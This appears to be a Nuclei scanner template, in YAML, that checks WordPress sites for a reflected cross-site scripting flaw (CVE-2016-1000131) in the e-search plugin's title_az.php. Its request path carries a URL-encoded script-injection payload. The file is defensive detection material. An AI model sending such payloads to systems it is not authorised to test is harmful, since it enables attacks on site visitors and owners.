nuclei-templates/cves/2016/CVE-2016-1000131.yaml

30 lines
696 B
YAML
Raw Normal View History

2021-07-16 17:55:47 +00:00
id: CVE-2016-1000131
info:
name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via title_az.php
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000131
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert(123);</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200